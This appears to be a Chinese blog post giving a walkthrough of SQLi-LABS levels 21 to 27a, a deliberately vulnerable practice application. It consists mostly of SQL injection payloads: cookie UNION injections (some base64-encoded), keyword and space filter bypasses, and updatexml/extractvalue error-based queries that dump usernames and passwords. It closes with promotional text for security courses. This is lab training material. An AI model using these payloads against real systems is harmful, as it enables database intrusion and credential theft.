SQLi-LABS的Less21-30分析_less-21 coolie注入

2401_84281655

于 2024-04-28 17:23:04 发布

阅读量714

点赞数 27

分类专栏：程序员文章标签： less 数据库 sql

本文链接：https://blog.csdn.net/2401_84281655/article/details/138285127

版权

程序员专栏收录该内容

167 篇文章 2 订阅

订阅专栏

Cookie: uname=1’) UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_schema = ‘security’ AND table_name = ‘users’#

Cookie: uname=MScpIFVOSU9OIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBGUk9NIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIFdIRVJFIHRhYmxlX3NjaGVtYSA9ICdzZWN1cml0eScgQU5EIHRhYmxlX25hbWUgPSAndXNlcnMnIw==

Cookie: uname=1’) UNION SELECT 1,2,group_concat(concat(“:”,username,password)) FROM security.users#

Cookie: uname=MScpIFVOSU9OIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KGNvbmNhdCgiOiIsdXNlcm5hbWUscGFzc3dvcmQpKSBGUk9NIHNlY3VyaXR5LnVzZXJzIw==

Less22

总的来说与Less21基本一样，不过注入点为双引号"

Less23

输入?id=1正常显示，输入?id=1‘或者?id=1’)或者?id=1’))报错，加入注释符–+或者#还报错，那么推测也许将注释符号过滤了，那么尝试//‘?id=1’(这语句结束后带个’来与括号后的’闭合从而结束语句)‘，那么尝试下万能语句看看?id=1’ or 1=1 or’显示正常了，?id=1’) or 1=1 or’或者?id=1’)) or 1=1 or’报错，那么注入点为’输入语句

?id=-1’ UNION SELECT 1,2,3 ’

爆库

?id=-1’ UNION SELECT 1,2,database() ’

爆表名

?id=-1’ UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema=‘security’ ’

爆字段吧

?id=-1’ union select 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_schema=‘security’ and table_name=‘users’ ’

爆数据的时候报错了

?id=-1’ UNION SELECT 1,2,group_concat(concat_ws(‘:’,username,password)) FROM users’

那么也许格式语法问题，不过用个where语句试试看

?id=-1’ UNION SELECT 1,2,group_concat(concat_ws(‘:’,username,password)) FROM users where ‘1’='1

这语句成功通过

Less24

在登陆界面注入登录失败了，那么输入admin看看会发生什么显示你可改密码，返回页面点new users click here设置新用户admin’看看然后返回主页面登录成功

Less25

明显的提示all your ‘or’ and ‘and’ belong to us

照例先输入?id=1或者?id=1’或者?id=1’)或者?id=1"或者?id=1")

那么输入?id=1’或者?id=1’)报错了

加上注释符f分别输入?id=1’–+跟?id=1’)–+

那么?id=1’–+没报错，猜测注入点为’

根据提示your ‘or’ belong to us那么用or构造个万能语句看看输入?id=1’ or 1=1–+

显示为报错

那么怎么使用or不报错了

试试在语句or插入一个or语句，如果中间or被过滤掉了剩余部分构成or就成功了

判断列数

?id=1’ oorrder by 4–+

使用union语句

?id=-1’ UNION SELECT 1,2,3–+

爆库

?id=-1’ UNION SELECT 1,2,database()–+

爆表名

?id=-1’ UNION SELECT 1,2,group_concat(table_name) FROM infoorrmation_schema.tables WHERE table_schema = ‘security’–+

爆字段名

?id=-1’ union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name=‘users’–+

爆数据

?id=-1’ union select 1,2,group_concat(concat_ws(“:”,username,passwoorrd)) from security.users–+

Less-25a

将1’改为1，其他与Less-25没什么区别

Less-26

看到提示all your spaces and comments belong to us

输入得到?id=1’或者?id=1’)报错，加上注释符–+仍然报错

那么根据Less25的经验输入?id=‘’

看看会发生什么，显示成功没报错，那么注入点为’

被过滤的字符，可用其他的字符进行替代，用"%a0"或"%0b"替代空格，用"||“替代"or”，使用"%26%26"替代"and"

输入?id=-1’ || 1 = 1 || ’

显示正常

那么用updatexml()报错注入爆库名吧

?id=-1’ || updatexml(1,concat(0x7e,database()),1) || ‘1’='1

爆表名

?id=1’ || updatexml(1, concat(0x7e, (SELECT (group_concat(table_name)) FROM (infoorrmation_schema.tables) WHERE (table_schema=‘security’))) ,1) || ‘1’='1

爆字段名

?id=1’||updatexml(1,concat(1,(SELECT (group_concat(column_name)) FROM (infoorrmation_schema.columns) WHERE (table_schema=‘security’ %26%26 table_name = ‘users’))) ,1) || ‘1’='1

爆数据

试着觉得无法直接从users表拿数据，那么先用一个表暂存然后利用另一个去拿

?id=-1’ || updatexml(1,concat(0x0a,(SELECT(group_concat(concat_ws(0x3a,username,passwoorrd))) FROM (security.users) WHERE (id = 1) )) ,1) || ‘1’='1

Less-26a

注入点为’)

Less27

注入点为’

爆库

?id=1’%0band%0bextractvalue(1,concat(0x7e,database(),0x7e))%0bor%0b’1’='1

爆表

?id=1’%0band%0bextractvalue(1,concat(0x7e,(selecT%0bgroup_concat(table_name)%0bfrom%0binformation_schema.tables%0bwhere%0btable_schema=database()),0x7e))%0bor%0b’1’='1

//直接select会被过滤掉要改为selecT

爆字段

?id=1’%0band%0bextractvalue(1,concat(0x7e,(selecT%0bgroup_concat(column_name)%0bfrom%0binformation_schema.columns%0bwhere%0btable_schema=database()%0band%0btable_name=‘users’),0x7e))%0bor%0b’1’='1

爆数据

?id=1’%0band%0bextractvalue(1,concat(0x7e,(selecT%0bgroup_concat(username,password)%0bfrom%0busers),0x7e))%0bor%0b’1’='1

Less-27a

输入?id=1"报错，?id=1")%0Bor%0B(“1”)=(“1报错，?id=1”%0bor%0b"1"="1正常

那么猜测属于双引号注入

看看回显怎么样

?id=0"%0bunioN%0bselecT%0b1,2,3%0bor%0b"1"="1

//输入-1好像被过滤了，不输入数字或者输入0较好

爆库

?id=0"%0bunioN%0bselecT%0b1,database(),3%0bor"1"="1

还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！

王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。

对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！

【完整版领取方式在文末！！】

93道网络安全面试题

内容实在太多，不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料，给那些想学习网络安全的小伙伴们一点帮助！

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

1️⃣零基础入门

① 学习路线

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供：

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化资料的朋友，可以点击这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

2401_84281655

关注

27
点赞
踩
28

收藏

觉得还不错? 一键收藏
0
评论
SQLi-LABS的Less21-30分析_less-21 coolie注入

Less22总的来说与Less21基本一样，不过注入点为双引号"Less23输入?id=1正常显示，输入?id=1‘或者?id=1’)或者?id=1’))报错，加入注释符–+或者#还报错，那么推测也许将注释符号过滤了，那么尝试//‘?id=1’(这语句结束后带个’来与括号后的’闭合从而结束语句)‘，那么尝试下万能语句看看?id=1’ or 1=1 or’显示正常了，?id=1’) or 1=1 or’或者?id=1’)) or 1=1 or’报错，那么注入点为’输入语句?爆库?爆表名?爆字段吧。
复制链接

扫一扫